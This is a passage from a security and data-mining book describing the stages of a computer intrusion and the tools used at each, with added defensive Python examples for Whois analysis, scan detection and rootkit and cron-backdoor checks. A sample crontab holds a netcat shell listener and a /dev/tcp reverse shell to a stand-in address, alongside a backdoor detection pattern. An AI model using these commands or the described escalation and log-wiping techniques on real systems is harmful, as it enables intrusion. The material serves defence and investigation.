10.2 Intrusion MOs



Before we detail how intrusion detection systems work, it is important to describe some of the common techniques, utilities, tools, and schemes used by hackers. An intentional system intrusion passes through half a dozen stages: from the initial targeting of a system, to increasingly daring probes, escalating to an all-out attack, to a system takeover and the planting of backdoors that let the criminal return. Investigators who are not familiar with these tools and utilities are strongly encouraged to use a search engine, such as Google.com, to research and even download them.

10.2.1 Intelligence

Any attack, just like a common burglary, starts with the intruder "casing the joint," that is, assessing the premises where the crime will take place, whether a bank or a server. The thief needs to know where the cameras and exits are in order to make a quick getaway without revealing his or her identity. This is the initial information-gathering phase, and it can involve open-source search engines, Whois servers, Usenet, EDGAR, and Domain Name Service (DNS) lookups to build a composite picture of the target system.

MO

EDGAR This is the Securities and Exchange Commission (SEC) database at http://www.sec.gov, which provides a comprehensive view of publicly traded companies. Filings such as the 10-Q and 10-K give a quick snapshot of a company's recent activities, in particular new acquisitions, which may be the easiest path to a system penetration: the parent company will often scramble to bring a newly acquired entity into its networks and Web site, with security lagging behind, so a hacker will note the new entities on file and target them first.

Usenet Postings by anyone associated with the company seeking technical assistance may signal a possible opening for an intrusion, since such requests routinely reveal the hardware, software, and configuration in use. This material is readily available on the Internet to any hacker who knows what to look for.

Whois Whois servers identify the domain names and associated networks registered to a particular firm or organization. These databases can be queried at http://www.networksolutions.com, http://www.arin.net, http://www.allwhois.com, or http://samspade.org. They yield intelligence a hacker can use before an intrusion attempt: domain names, registration data, the organization, points of contact, and network IP address ranges. The administrative contact is an especially valuable item, since a hacker can send spoofed e-mail posing as the administrative contact and requesting a password change. Here is a sample of the information a Whois server provides:

    Request: webminer.com

    Registrant:
       WebMiner (WEBMINER-DOM)
       2101 Shoreline Drive Suite 290
       Alameda, CA 94501
       US

       Domain Name: WEBMINER.COM

       Administrative Contact, Billing Contact:
          Martines, Earl  (ECF327)  earl@LUMINAAMERICAS.COM
          Webminer
          760 Broadway 2nd Floor
          New York, NY  10012
          US
          648.437-3331 646.437-3366
       Technical Contact:
          Hostmaster, Intermedia  (H02936-ORG)
          hostmaster@INTERMEDIA.NET
          Intermedia Corporation
          953 Industrial Ave. Ste.121
          Palo Alto, CA 94303
          US
          650-424-9935
          Fax- - 650-424-9936

       Record last updated on 10-May-2001.
       Record expires on 01-May-2003.
       Record created on 30-Apr-1997.
       Database last updated on 18-Apr-2002 02:25:00 EDT.

       Domain servers in listed order:

       NS2.INTERMEDIA.NET          207.5.44.2
       NS3.INTERMEDIA.NET          207.5.1.222

Domain Name Service (DNS) Having identified the associated domains, an attacker may begin to query DNS, the distributed database that maps hostnames to IP addresses and vice versa; secondary name servers hold copies of each zone for redundancy. This service can be abused. If a name server is configured insecurely, for example by answering zone-transfer requests from anyone, the internal hostnames and IP addresses it carries may be disclosed to an attacker across the Internet, providing a complete map of a firm's internal network.
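Run through a small parser, the Whois record above shows exactly what an intruder harvests from it and the exposure each item creates. The following Python code is an added example, not from the book: the record is transcribed from the listing above, and the two checks it applies (an administrative contact whose mailbox sits outside the registered domain, and name servers hosted by a third party) are this editor's, not the chapter's.

```python
import re

# Transcribed from the Network Solutions listing shown above (constructed sample input).
SAMPLE_WHOIS = """\
Request: webminer.com

Registrant:
   WebMiner (WEBMINER-DOM)
   2101 Shoreline Drive Suite 290
   Alameda, CA 94501
   US

   Domain Name: WEBMINER.COM

   Administrative Contact, Billing Contact:
      Martines, Earl  (ECF327)  earl@LUMINAAMERICAS.COM
      Webminer
      760 Broadway 2nd Floor
      New York, NY  10012
      US
      648.437-3331 646.437-3366
   Technical Contact:
      Hostmaster, Intermedia  (H02936-ORG)
      hostmaster@INTERMEDIA.NET
      Intermedia Corporation
      953 Industrial Ave. Ste.121
      Palo Alto, CA 94303
      US
      650-424-9935
      Fax- - 650-424-9936

   Record last updated on 10-May-2001.
   Record expires on 01-May-2003.
   Record created on 30-Apr-1997.
   Database last updated on 18-Apr-2002 02:25:00 EDT.

   Domain servers in listed order:

   NS2.INTERMEDIA.NET          207.5.44.2
   NS3.INTERMEDIA.NET          207.5.1.222
"""

EMAIL_RE = re.compile(r"[\w.+-]+@[\w.-]+\.[A-Za-z]{2,}")
NS_RE = re.compile(r"^([A-Za-z0-9.-]+)\s+(\d{1,3}(?:\.\d{1,3}){3})$")
DATE_RE = re.compile(r"Record (created|expires|last updated) on (\d{2}-\w{3}-\d{4})")


def parse_whois(text):
    """Pull the intruder-relevant fields out of a Network Solutions style record.

    Sections are introduced by a line ending in ':'; within a section the first
    e-mail address is taken as that contact, and name servers are matched only
    inside the 'Domain servers in listed order' section."""
    rec = {"domain": None, "contacts": {}, "nameservers": [], "dates": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Domain Name:"):
            rec["domain"] = line.split(":", 1)[1].strip().lower()
            continue
        if line.endswith(":"):
            section = line[:-1]
            continue
        m = NS_RE.match(line)
        if m and section == "Domain servers in listed order":
            rec["nameservers"].append((m.group(1).lower(), m.group(2)))
            continue
        m = DATE_RE.search(line)
        if m:
            rec["dates"][m.group(1)] = m.group(2)
            continue
        m = EMAIL_RE.search(line)
        if m and section and section not in rec["contacts"]:
            rec["contacts"][section] = m.group(0).lower()
    return rec


def intelligence_findings(rec):
    """Exposures an intruder would note (checks are this example's, not the book's)."""
    findings = []
    dom = rec["domain"]
    for role, email in rec["contacts"].items():
        if "Administrative" in role and email.split("@", 1)[1] != dom:
            findings.append(f"{role} uses {email}, outside {dom}: a spoofed "
                            "password-change request from this address is hard to verify")
    ns_domains = {ns.split(".", 1)[1] for ns, _ in rec["nameservers"]}
    if ns_domains and dom not in ns_domains:
        findings.append(f"DNS hosted by a third party ({', '.join(sorted(ns_domains))}): "
                        "zone-transfer policy is outside the target's control")
    return findings


if __name__ == "__main__":
    record = parse_whois(SAMPLE_WHOIS)
    print(record)
    for finding in intelligence_findings(record):
        print("-", finding)
```

The parser is deliberately tolerant of the contact block layout (the e-mail address may sit on the contact's name line or on its own line, as the two contacts above show), because the attacker's tools, like the investigator's, have to cope with whatever the registrar prints.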

10.2.2 Scanning

At this phase an intruder begins to use a different set of tools to identify listening services, searching for the best place to break in. This involves ping sweeps and port scans carried out with automated discovery tools. The perpetrator's objective is to determine which hosts are alive and which ports are in a listening state and accessible via the Internet.

MO

fping Ping is a basic utility used to find out whether a system is alive: it sends an Internet Control Message Protocol (ICMP) echo request to a target and waits for a reply. fping is a ping-like program that does the same thing for many hosts at once, sweeping multiple IP addresses in parallel. The user can specify any number of hosts on the command line or a file containing the list of hosts to ping. Instead of trying one host until it times out or replies, fping sends a packet and moves on to the next host in a round-robin fashion; a host that replies is noted and removed from the list, and a host that does not respond within the time or retry limit is reported as unreachable. Unlike ping, fping is designed to be driven from scripts, and its output is easy to parse.

icmpenum This is another utility for testing whether a system is alive, and it can reach hosts behind border routers or firewalls that drop the ICMP echo packets the ping utility relies on. Host enumeration is the act of determining the IP addresses of potential targets on a network. icmpenum probes not only with ICMP echo packets but also with ICMP timestamp and ICMP information request packets, and it supports spoofing the source address and listening promiscuously for the replies. It is effective against networks that block ICMP echo but have failed to block timestamp or information requests, and for upstream sniffing of replies addressed to trusted hosts. It is a proof-of-concept tool demonstrating distributed attack concepts, such as sending packets from one workstation and sniffing the reply packets on another.

Nmap Nmap ("Network Mapper") is an open source port scanner used, among other things, to determine the operating system a target computer runs, a key piece of intelligence for planning an attack. Other scanners include NetScan, SuperScan, WinScan, ipEye, and WUPS. Nmap was designed to scan large networks rapidly, although it works fine against single hosts. It uses raw IP packets in novel ways to determine what hosts are available on a network, what services (ports) they offer, what operating system and version they run, what type of packet filters or firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers, in both console and graphical versions, and is free software available with full source code. On the defensive side, port scans are detected by network-based intrusion detection systems such as Snort, which is free, and commercial products such as RealSecure.
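Since the chapter's concern is finding these probes in log files, here is the detection logic a data-mining analysis applies to firewall logs, as an added Python example that is not from the book: a vertical port scan (the Nmap case) appears as one source touching many distinct ports on one host within a short window, and a ping sweep (the fping and icmpenum case) as one source sending ICMP echo requests to many distinct hosts. The log format, the addresses, and the thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall-style log (not from the book). Fields:
#   date time action proto src dst target
# where target is the TCP/UDP destination port or the ICMP message type.
# Denied probes are still evidence: the scanner learns from the lack of a reply too.
SAMPLE_LOG = """\
2002-04-18 02:25:01 DENY TCP 203.0.113.7 192.168.10.5 21
2002-04-18 02:25:01 DENY TCP 203.0.113.7 192.168.10.5 22
2002-04-18 02:25:01 DENY TCP 203.0.113.7 192.168.10.5 23
2002-04-18 02:25:02 DENY TCP 203.0.113.7 192.168.10.5 25
2002-04-18 02:25:02 PERMIT TCP 203.0.113.7 192.168.10.5 80
2002-04-18 02:25:02 DENY TCP 203.0.113.7 192.168.10.5 110
2002-04-18 02:25:03 PERMIT TCP 203.0.113.7 192.168.10.5 139
2002-04-18 02:25:03 DENY TCP 203.0.113.7 192.168.10.5 443
2002-04-18 02:30:00 PERMIT ICMP 198.51.100.9 192.168.10.1 echo
2002-04-18 02:30:00 PERMIT ICMP 198.51.100.9 192.168.10.2 echo
2002-04-18 02:30:00 PERMIT ICMP 198.51.100.9 192.168.10.3 echo
2002-04-18 02:30:01 PERMIT ICMP 198.51.100.9 192.168.10.4 echo
2002-04-18 02:30:01 PERMIT ICMP 198.51.100.9 192.168.10.5 echo
2002-04-18 02:30:01 PERMIT ICMP 198.51.100.9 192.168.10.6 echo
2002-04-18 09:00:00 PERMIT TCP 192.0.2.44 192.168.10.5 80
2002-04-18 09:00:05 PERMIT TCP 192.0.2.44 192.168.10.5 443
"""


def parse_log(text):
    """Split each log line into a dict with a real timestamp for windowing."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, action, proto, src, dst, target = line.split()
        events.append({"ts": datetime.fromisoformat(f"{date} {time}"), "action": action,
                       "proto": proto, "src": src, "dst": dst, "target": target})
    return events


def _max_distinct_in_window(events, window, key):
    """Largest number of distinct key(e) values seen within any span of `window`."""
    events = sorted(events, key=lambda e: e["ts"])
    best = 0
    for i, first in enumerate(events):
        seen = set()
        for e in events[i:]:
            if e["ts"] - first["ts"] > window:
                break
            seen.add(key(e))
        best = max(best, len(seen))
    return best


def detect_scans(events, window=timedelta(seconds=60), port_threshold=5, host_threshold=5):
    """Return (kind, src, dst, count) alerts for vertical port scans and ping sweeps."""
    tcp_udp = defaultdict(list)    # (src, dst) -> events: one host, many ports
    icmp_echo = defaultdict(list)  # src -> events: many hosts pinged
    for e in events:
        if e["proto"] in ("TCP", "UDP"):
            tcp_udp[(e["src"], e["dst"])].append(e)
        elif e["proto"] == "ICMP" and e["target"] == "echo":
            icmp_echo[e["src"]].append(e)
    alerts = []
    for (src, dst), evs in tcp_udp.items():
        n = _max_distinct_in_window(evs, window, lambda e: e["target"])
        if n >= port_threshold:
            alerts.append(("PORT_SCAN", src, dst, n))
    for src, evs in icmp_echo.items():
        n = _max_distinct_in_window(evs, window, lambda e: e["dst"])
        if n >= host_threshold:
            alerts.append(("PING_SWEEP", src, None, n))
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(parse_log(SAMPLE_LOG)):
        print(*alert)
```

The ordinary Web client at 192.0.2.44 touches two ports five seconds apart and stays below the threshold; the scanner at 203.0.113.7 hits eight ports in two seconds. A horizontal scan (one port across many hosts, the other pattern Nmap produces) is detected the same way by keying on (src, port) and counting distinct destinations, and the thresholds should be tuned against a site's own baseline traffic rather than taken from this example.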

10.2.3 Probing

At this phase, an attacker will attempt to identify user accounts and groups, network resources and file shares, and applications. These probes differ depending on the operating system of the target computer: Windows NT/2000, Novell NetWare, Linux, or UNIX.

MO

DumpSec This is a tool for discovering and listing the user accounts on a system or network. DumpSec is a security auditing program for Microsoft Windows NT. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers, and shares in a concise, readable list format, so that holes in system security are readily apparent. DumpSec also dumps user, group, and replication information.

Sid2user This is another utility for revealing user accounts. It works together with User2sid.exe: User2sid calls the Win32 function LookupAccountName to translate a known account name (for example, the built-in Guest account) into its security identifier (SID), which reveals the SID of the local or remote machine or its domain. Sid2user.exe then calls LookupAccountSid on that SID with successive relative identifiers (RIDs) appended, recovering the account names one by one; because the built-in Administrator account always has RID 500, it is found even if it has been renamed. These utilities do not exploit a bug; they call documented functions, and they can be run against a remote machine without logon credentials beyond those needed for a null session connection.

OnSite Admin This utility lists user accounts on Novell systems. Originally a multi-server analysis, maintenance, and configuration tool for NetWare servers, it allows the user to monitor, analyze, update, and configure multiple servers from a single workstation.

10.2.4 Attack

This is the phase in which an intruder has gathered enough information about ports and users to attempt access to the target system or network. Depending on the operating system, the attempt may take different routes. Windows 95/98 and Millennium are the most susceptible to break-ins: as end-user operating systems lacking the security model of NT/2000 and other network OSs, they are the easiest to attack via the Internet or e-mail.

MO

tcpdump This is a utility for eavesdropping on network traffic, including any passwords sent in the clear. It is the most popular packet sniffer and analyzer for UNIX systems.

NAT The NetBIOS Auditing Tool, when invoked, attempts to gain access to Windows file shares by brute-forcing account names and passwords over NetBIOS.

pwdump2 This is another password file-grabbing utility. It dumps the password hashes (one-way functions, or OWFs) from NT's SAM database, both the LanManager and the NT hash for each account, in a form that cracking tools read directly.

It should be noted at this juncture that most IDS and data mining analyses concentrate on finding the traces of these probes and attacks in system log files in order to detect potential intrusion attempts.

10.2.5 Control

At this phase the perpetrator seeks full control of the target system. For example, when TCP ports 135 or 139 are found open during scanning, the system is identified as likely running NT, and the following tools will be used to gain administrator privileges.

MO

L0phtCrack This is a password-cracking tool. L0phtCrack takes hashes captured off the network by a sniffer or extracted by programs like pwdump and recovers the plaintext passwords by dictionary and brute-force attack; it breaks both the older LanManager hashes and the newer NT-style hashes.

getadmin This program adds a user to the Administrators group, allowing an intruder to become Administrator of an NT machine and gain total control of the target system.

sechole This utility also adds a user to the Administrators group. It performs a sophisticated sequence of steps that gives a non-administrative user debug-level access to a system process; with that access the user can run code in the system security context and thereby grant local administrative privileges on the NT system.

10.2.6 Stealth

In this final phase, total ownership of the target system has been secured, and the attacker will begin to cover his or her tracks from the system administrators, planting trapdoors to preserve privileged access and enable a return.

MO

rhosts The .rhosts file lists the hosts and users that the local host trusts for rlogin and rsh access without a password. An intruder who can write to it adds entries that guarantee a way back in.

zap This is a tool for clearing logs and removing the evidence of an intrusion.

rootkits A rootkit is a collection of tools for hiding an intruder's presence. Perpetrators use it to hide and secure their foothold on a system by replacing programs such as ls and ps with modified versions: ls is altered not to display the intruder's files, and ps is modified not to display the intruder's processes.

cron This is the UNIX scheduler for batch jobs. Cron is a background daemon that quietly launches commands at specified dates and times; an intruder can use it to restart a backdoor or reconnect to a remote host at regular intervals.

netcat This is a utility for planting remote-control services. It reads and writes data across network connections using the TCP or UDP protocol. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs, and it is a feature-rich network debugging and exploration tool that can create almost any kind of connection a perpetrator needs, including a listener that hands a shell to whoever connects.

VNC This is a program for remotely taking over NT desktops (GUIs). VNC stands for virtual network computing. It is, in essence, a remote display system that allows the perpetrator to view and operate a desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of other machine architectures.

BO2K This is Back Orifice 2000, a remote-control trojan used for the complete takeover of a Microsoft Windows system.
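Here is the defender's counterpart to the rootkit and cron entries above, as an added Python example that is not from the book: a file-integrity check that compares ls and ps against SHA-256 hashes recorded while the host was clean, and a crontab scan for lines that start a netcat listener or a /dev/tcp reverse shell. The "binaries", the baseline, and the crontab are constructed in a temporary directory so the example runs stand-alone; the netcat flags it looks for are the traditional -l (listen), -p (port), and -e (execute a program), and the patterns are this editor's assumptions, not a complete signature set.

```python
import hashlib
import re
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_baseline(baseline):
    """baseline maps path -> SHA-256 recorded while the host was clean.

    Returns (path, reason) for every binary that no longer matches. The baseline
    must live off the host: a rootkit that trojans ls and ps can edit a local one."""
    findings = []
    for path, expected in baseline.items():
        try:
            actual = sha256_file(path)
        except FileNotFoundError:
            findings.append((path, "missing"))
            continue
        if actual != expected:
            findings.append((path, "modified"))
    return findings


# Assumed patterns: a netcat binary with listen/exec/port flags, or bash's /dev/tcp idiom.
BACKDOOR_RE = re.compile(r"\b(nc|netcat|ncat)\b.*(\s-l\b|\s-e\s|\s-p\s*\d+)|/dev/tcp/")


def suspicious_cron_lines(crontab_text):
    """Crontab entries (comments skipped) that would periodically re-plant a backdoor."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and BACKDOOR_RE.search(line):
            hits.append(line)
    return hits


# Constructed crontab: one legitimate job, one netcat listener, one reverse shell.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * /usr/bin/nc -l -p 31337 -e /bin/sh
30 2 * * * /bin/bash -c 'exec 5<>/dev/tcp/203.0.113.7/443; cat <&5 | sh >&5'
"""


def demo():
    """Stand-ins for ls and ps in a temp dir: baseline both, trojan ps, then check."""
    with tempfile.TemporaryDirectory() as d:
        ls, ps = Path(d, "ls"), Path(d, "ps")
        ls.write_bytes(b"\x7fELF original ls")
        ps.write_bytes(b"\x7fELF original ps")
        baseline = {str(ls): sha256_file(ls), str(ps): sha256_file(ps)}  # taken while clean
        ps.write_bytes(b"\x7fELF trojaned ps that hides the intruder's processes")
        integrity = verify_baseline(baseline)
    return integrity, suspicious_cron_lines(SAMPLE_CRONTAB)


if __name__ == "__main__":
    integrity, cron_hits = demo()
    for path, reason in integrity:
        print(f"{reason}: {path}")
    for line in cron_hits:
        print(f"suspicious cron entry: {line}")
```

Two caveats follow from the Stealth tools themselves. Because zap clears the logs, the integrity check, not the log, is often the only surviving evidence of the substitution; and because a kernel-level rootkit can lie to the hashing program about file contents, the check should be run from clean boot media with the baseline kept elsewhere.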

As previously noted, cybercriminals can be classified as external intruders, who are unauthorized users of the machines they attack, or internal intruders, who have access to the host system but not to certain portions of it. Internal intruders may also masquerade as another user, such as one with legitimate access to especially sensitive data. The most dangerous type is the clandestine intruder, who has the power to turn off audit trails and take control of systems. System intrusions can also be viewed in terms of the following main categories:

  1. Attempted break-ins or masquerade attacks, which may be detected by atypical behavior profiles or violations of security constraints.

  2. Penetration of the security control system, which may be detected by monitoring for specific patterns of activity.

  3. Leakage or denial of service, which may be detected by atypical use of system resources.

  4. Malicious use, which is detected by atypical behavior profiles, violations of security constraints, and the use of special privileges.




Investigative Data Mining for Security and Criminal Detection
ISBN: 0750676132
Year: 2005
Pages: 232
Authors: Jesus Mena